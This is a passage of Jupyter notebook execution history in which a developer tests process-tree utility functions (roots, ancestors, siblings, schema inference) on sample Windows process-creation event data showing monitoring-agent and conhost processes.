"isinstance(ptutil.get_parent(p_tree, bottom_desc), pd.Series)" }, "executionTime": "2019-12-13T20:53:30.369Z" }, { "cell": { "executionCount": 34, "executionEventId": "706c36ec-09ae-411e-bd55-71a7dd44602c", "hasError": false, "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03", "outputs": [ { "data": { "text/plain": "'c:\\\\windows\\\\system32\\\\conhost.exe0x183c2019-02-09 21:02:56.273000'" }, "execution_count": 34, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86", "text": "ptutil.build_process_key(bottom_desc)" }, "executionTime": "2019-12-13T20:54:10.207Z" }, { "cell": { "executionCount": 35, "executionEventId": "c5d7a3a4-94e1-4749-ab58-f3f142776722", "hasError": false, "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03", "outputs": [ { "data": { "text/plain": "True" }, "execution_count": 35, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86", "text": "ptutil.build_process_key(bottom_desc) == bottom_desc.name" }, "executionTime": "2019-12-13T20:54:22.117Z" }, { "cell": { "executionCount": 36, "executionEventId": "1383e72b-bdbd-455e-8575-236ddf7b5770", "hasError": false, "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03", "outputs": [ { "data": { "text/plain": "ProcSchema(process_name='NewProcessName', process_id='NewProcessId', parent_id='ProcessId', logon_id='SubjectLogonId', cmd_line='CommandLine', user_name='SubjectUserName', path_separator='\\\\', time_stamp='TimeGenerated', parent_name='ParentProcessName', target_logon_id='TargetLogonId', user_id='SubjectUserSid')" }, "execution_count": 36, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86", "text": "ptutil.infer_schema(p_tree)" }, "executionTime": "2019-12-13T20:54:55.961Z" }, { "cell": { "executionCount": 37, "executionEventId": "a0ee2963-2942-449f-801d-ca6f6da66ec1", "hasError": false, "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03", "outputs": [ { "data": { "text/plain": "True" }, "execution_count": 37, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86", "text": "ptutil.infer_schema(p_tree) == ptutil.WIN_EVENT_SCH" }, "executionTime": "2019-12-13T20:55:12.355Z" }, { "cell": { "executionCount": 38, "executionEventId": "6e53f76a-5b0e-4965-89e9-7d12b5293984", "hasError": false, "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03", "outputs": [ { "data": { "text/plain": "{'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}" }, "execution_count": 38, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86", "text": "ptutil.get_summary_info(p_tree)" }, "executionTime": "2019-12-13T20:55:41.333Z" }, { "cell": { "executionCount": 39, "executionEventId": "3fa00e6d-6635-43ef-ad81-6133d624d9d3", "hasError": false, "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03", "outputs": [], "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86", "text": "summary = ptutil.get_summary_info(p_tree)\nassert summary == {'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}" }, "executionTime": "2019-12-13T20:56:25.887Z" }, { "cell": { "executionCount": 40, "executionEventId": "b68ceeb2-b813-46f2-bda7-a3b51f139688", "hasError": true, "id": "5610ff3a-83b0-4253-92bb-feba160df533", "outputs": [ { "ename": "AssertionError", "evalue": "", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mAssertionError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[0;32m 16\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mbuild_process_key\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mbottom_desc\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mname\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 17\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m---> 18\u001b[1;33m \u001b[1;32massert\u001b[0m \u001b[1;33m(\u001b[0m\u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_root\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mall\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 19\u001b[0m \u001b[1;31m# ptutil.get_root_tree\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 20\u001b[0m \u001b[1;31m# ptutil.get_siblings\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;31mAssertionError\u001b[0m: " ] } ], "persistentId": "3961bef2-e361-4a29-8f22-e92096d739a8", "text": "assert len(ptutil.get_roots(p_tree)) == 10\nt_root = ptutil.get_roots(p_tree).iloc[4]\nfull_tree = ptutil.get_descendents(p_tree, t_root)\nassert len(s_tree) == 25\nchildren = ptutil.get_children(p_tree, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree, bottom_desc.name) == bottom_desc).all()\nassert (ptutil.get_process(p_tree, bottom_desc) == bottom_desc).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree, bottom_desc) == t_root).all()\n# ptutil.get_root_tree\n# ptutil.get_siblings\nassert ptutil.get_summary_info(p_tree) == {\n 'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}\n\nassert ptutil.infer_schema(p_tree) == ptutil.WIN_EVENT_SCH" }, "executionTime": "2019-12-13T20:57:46.681Z" }, { "cell": { "executionCount": 41, "executionEventId": "9940f32a-61b0-4260-822c-f3ae23ce66ec", "hasError": false, "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03", "outputs": [ { "data": { "text/plain": "TenantId 52b1ab41-869e-4138-9e40-2a4457f09bf0\nAccount NaN\nEventID 4688\nTimeGenerated 1970-01-01 00:00:00\nComputer MSTICAlertsWin1\nSubjectUserSid NaN\nSubjectUserName NaN\nSubjectDomainName NaN\nSubjectLogonId 0x3e7\nNewProcessId 0x864\nNewProcessName C:\\Program Files\\Microsoft Monitoring Agent\\Ag...\nTokenElevationType NaN\nProcessId NaN\nCommandLine NaN\nParentProcessName NaN\nTargetLogonId NaN\nSourceComputerId NaN\nTimeCreatedUtc NaT\nEffectiveLogonId 0x3e7\nnew_process_lc c:\\program files\\microsoft monitoring agent\\ag...\nparent_proc_lc NaN\nsource_index 1004\nNewProcessId_par NaN\nEffectiveLogonId_par NaN\nnew_process_lc_par NaN\nsource_index_par NaN\nProcessId_par NaN\nNewProcessName_par NaN\nTimeGenerated_orig_par NaT\nparent_key NaN\nIsRoot True\nIsLeaf False\nIsBranch False\npath 1004\nparent_index NaN\nName: c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe0x8641970-01-01 00:00:00.000000, dtype: object" }, "execution_count": 41, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86", "text": "ptutil.get_root(p_tree, bottom_desc)" }, "executionTime": "2019-12-13T20:58:03.358Z" }, { "cell": { "executionCount": 42, "executionEventId": "3e87d93c-7003-4061-8bd2-98a64d0987ce", "hasError": false, "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7", "outputs": [ { "data": { "text/plain": "TenantId 52b1ab41-869e-4138-9e40-2a4457f09bf0\nAccount NaN\nEventID 4688\nTimeGenerated 1970-01-01 00:00:00\nComputer MSTICAlertsWin1\nSubjectUserSid NaN\nSubjectUserName NaN\nSubjectDomainName NaN\nSubjectLogonId 0x3e7\nNewProcessId 0x864\nNewProcessName C:\\Program Files\\Microsoft Monitoring Agent\\Ag...\nTokenElevationType NaN\nProcessId NaN\nCommandLine NaN\nParentProcessName NaN\nTargetLogonId NaN\nSourceComputerId NaN\nTimeCreatedUtc NaT\nEffectiveLogonId 0x3e7\nnew_process_lc c:\\program files\\microsoft monitoring agent\\ag...\nparent_proc_lc NaN\nsource_index 1004\nNewProcessId_par NaN\nEffectiveLogonId_par NaN\nnew_process_lc_par NaN\nsource_index_par NaN\nProcessId_par NaN\nNewProcessName_par NaN\nTimeGenerated_orig_par NaT\nparent_key NaN\nIsRoot True\nIsLeaf False\nIsBranch False\npath 1004\nparent_index NaN\nName: c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe0x8641970-01-01 00:00:00.000000, dtype: object" }, "execution_count": 42, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c", "text": "t_root" }, "executionTime": "2019-12-13T20:58:12.387Z" }, { "cell": { "executionCount": 43, "executionEventId": "15c281e8-0c4b-4e46-a5ec-0498e03ac4b2", "hasError": false, "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03", "outputs": [ { "data": { "text/plain": "TenantId True\nAccount False\nEventID True\nTimeGenerated True\nComputer True\nSubjectUserSid False\nSubjectUserName False\nSubjectDomainName False\nSubjectLogonId True\nNewProcessId True\nNewProcessName True\nTokenElevationType False\nProcessId False\nCommandLine False\nParentProcessName False\nTargetLogonId False\nSourceComputerId False\nTimeCreatedUtc False\nEffectiveLogonId True\nnew_process_lc True\nparent_proc_lc False\nsource_index True\nNewProcessId_par False\nEffectiveLogonId_par False\nnew_process_lc_par False\nsource_index_par False\nProcessId_par False\nNewProcessName_par False\nTimeGenerated_orig_par False\nparent_key False\nIsRoot True\nIsLeaf True\nIsBranch True\npath True\nparent_index False\nName: c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe0x8641970-01-01 00:00:00.000000, dtype: bool" }, "execution_count": 43, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86", "text": "ptutil.get_root(p_tree, bottom_desc) == t_root" }, "executionTime": "2019-12-13T20:58:31.783Z" }, { "cell": { "executionCount": 44, "executionEventId": "35a2f2bf-6474-4b5f-a3b3-d87681d9fb1f", "hasError": false, "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03", "outputs": [ { "data": { "text/plain": "TenantId 52b1ab41-869e-4138-9e40-2a4457f09bf0\nAccount NaN\nEventID 4688\nTimeGenerated 1970-01-01 00:00:00\nComputer MSTICAlertsWin1\nSubjectUserSid NaN\nSubjectUserName NaN\nSubjectDomainName NaN\nSubjectLogonId 0x3e7\nNewProcessId 0x864\nNewProcessName C:\\Program Files\\Microsoft Monitoring Agent\\Ag...\nTokenElevationType NaN\nProcessId NaN\nCommandLine NaN\nParentProcessName NaN\nTargetLogonId NaN\nSourceComputerId NaN\nTimeCreatedUtc NaT\nEffectiveLogonId 0x3e7\nnew_process_lc c:\\program files\\microsoft monitoring agent\\ag...\nparent_proc_lc NaN\nsource_index 1004\nNewProcessId_par NaN\nEffectiveLogonId_par NaN\nnew_process_lc_par NaN\nsource_index_par NaN\nProcessId_par NaN\nNewProcessName_par NaN\nTimeGenerated_orig_par NaT\nparent_key NaN\nIsRoot True\nIsLeaf False\nIsBranch False\npath 1004\nparent_index NaN\nName: c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe0x8641970-01-01 00:00:00.000000, dtype: object" }, "execution_count": 44, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86", "text": "ptutil.get_root(p_tree, bottom_desc)" }, "executionTime": "2019-12-13T20:59:11.228Z" }, { "cell": { "executionCount": 45, "executionEventId": "5a7c93b8-3551-4d8d-a096-381948ec6594", "hasError": false, "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03", "outputs": [ { "data": { "text/plain": "TenantId True\nAccount False\nEventID True\nTimeGenerated True\nComputer True\nSubjectUserSid False\nSubjectUserName False\nSubjectDomainName False\nSubjectLogonId True\nNewProcessId True\nNewProcessName True\nTokenElevationType False\nProcessId False\nCommandLine False\nParentProcessName False\nTargetLogonId False\nSourceComputerId False\nTimeCreatedUtc False\nEffectiveLogonId True\nnew_process_lc True\nparent_proc_lc False\nsource_index True\nNewProcessId_par False\nEffectiveLogonId_par False\nnew_process_lc_par False\nsource_index_par False\nProcessId_par False\nNewProcessName_par False\nTimeGenerated_orig_par False\nparent_key False\nIsRoot True\nIsLeaf True\nIsBranch True\npath True\nparent_index False\nName: c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe0x8641970-01-01 00:00:00.000000, dtype: bool" }, "execution_count": 45, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86", "text": "ptutil.get_root(p_tree, bottom_desc) == t_root" }, "executionTime": "2019-12-13T20:59:45.260Z" }, { "cell": { "executionCount": 46, "executionEventId": "5ebabd78-fe99-4997-8ade-39852e294e6a", "hasError": false, "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03", "outputs": [ { "data": { "text/plain": "TenantId True\nEventID True\nTimeGenerated True\nComputer True\nSubjectLogonId True\nNewProcessId True\nNewProcessName True\nEffectiveLogonId True\nnew_process_lc True\nsource_index True\nIsRoot True\nIsLeaf True\nIsBranch True\npath True\nName: c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe0x8641970-01-01 00:00:00.000000, dtype: bool" }, "execution_count": 46, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86", "text": "ptutil.get_root(p_tree, bottom_desc).dropna() == t_root.dropna()" }, "executionTime": "2019-12-13T21:00:08.333Z" }, { "cell": { "executionCount": 47, "executionEventId": "2543c638-99aa-4a74-86b7-67dcbbcd9be4", "hasError": false, "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03", "outputs": [ { "data": { "text/plain": "True" }, "execution_count": 47, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86", "text": "(ptutil.get_root(p_tree, bottom_desc).dropna() == t_root.dropna()).all()" }, "executionTime": "2019-12-13T21:00:53.067Z" }, { "cell": { "executionCount": 48, "executionEventId": "088d7f83-23b6-4f7a-930e-f5e8ac441bf4", "hasError": false, "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7", "outputs": [ { "data": { "text/html": "
\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
TenantIdAccountEventIDTimeGeneratedComputerSubjectUserSidSubjectUserNameSubjectDomainNameSubjectLogonIdNewProcessId...source_index_parProcessId_parNewProcessName_parTimeGenerated_orig_parparent_keyIsRootIsLeafIsBranchpathparent_index
proc_key
c:\\windows\\system32\\conhost.exe0x183c2019-02-09 21:02:56.27300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 21:02:56.273MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x183c...998.00x864C:\\Program Files\\Microsoft Monitoring Agent\\Ag...2019-02-09 21:02:56.256999936c:\\program files\\microsoft monitoring agent\\ag...FalseTrueFalse1004/10/1110
\n

1 rows × 35 columns

\n
", "text/plain": " TenantId \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n\n Account \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... WORKGROUP\\MSTICAlertsWin1$ \n\n EventID \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 4688 \n\n TimeGenerated \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 2019-02-09 21:02:56.273 \n\n Computer \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... MSTICAlertsWin1 \n\n SubjectUserSid \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... S-1-5-18 \n\n SubjectUserName \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... MSTICAlertsWin1$ \n\n SubjectDomainName \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... WORKGROUP \n\n SubjectLogonId \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 0x3e7 \n\n NewProcessId ... \\\nproc_key ... \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 0x183c ... \n\n source_index_par \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 998.0 \n\n ProcessId_par \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 0x864 \n\n NewProcessName_par \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... C:\\Program Files\\Microsoft Monitoring Agent\\Ag... \n\n TimeGenerated_orig_par \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 2019-02-09 21:02:56.256999936 \n\n parent_key \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... c:\\program files\\microsoft monitoring agent\\ag... \n\n IsRoot IsLeaf IsBranch \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... False True False \n\n path parent_index \nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 1004/10/11 10 \n\n[1 rows x 35 columns]" }, "execution_count": 48, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c", "text": "ptutil.get_siblings(p_tree, bottom_desc)" }, "executionTime": "2019-12-13T21:01:29.966Z" }, { "cell": { "executionCount": 49, "executionEventId": "cfe798e2-efc3-4509-a90e-628a44174886", "hasError": false, "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7", "outputs": [ { "data": { "text/html": "
\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
TenantIdAccountEventIDTimeGeneratedComputerSubjectUserSidSubjectUserNameSubjectDomainNameSubjectLogonIdNewProcessId...source_index_parProcessId_parNewProcessName_parTimeGenerated_orig_parparent_keyIsRootIsLeafIsBranchpathparent_index
proc_key
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x15c82019-02-09 20:32:56.26000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 20:32:56.260MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x15c8...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/51004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xcd82019-02-09 20:52:56.26000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 20:52:56.260MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xcd8...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/81004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x8dc2019-02-09 21:02:56.25700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 21:02:56.257MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x8dc...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/101004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xbd02019-02-09 21:32:56.27000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 21:32:56.270MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xbd0...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/151004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xe342019-02-09 22:02:56.26300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 22:02:56.263MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xe34...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/671004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x53c2019-02-09 22:32:56.24700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 22:32:56.247MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x53c...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/761004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xef42019-02-09 22:32:56.26000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 22:32:56.260MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xef4...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/781004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xd742019-02-09 23:22:56.25700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 23:22:56.257MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xd74...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1071004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x6f82019-02-09 23:32:56.26000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 23:32:56.260MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x6f8...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1201004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x1fc02019-02-10 00:02:56.25700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 00:02:56.257MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x1fc0...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1271004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x10bc2019-02-10 00:12:56.25300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 00:12:56.253MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x10bc...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1291004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xb482019-02-10 00:32:56.27000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 00:32:56.270MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xb48...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1391004
\n

12 rows × 35 columns

\n
", "text/plain": " TenantId \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n\n Account \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \n\n EventID \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 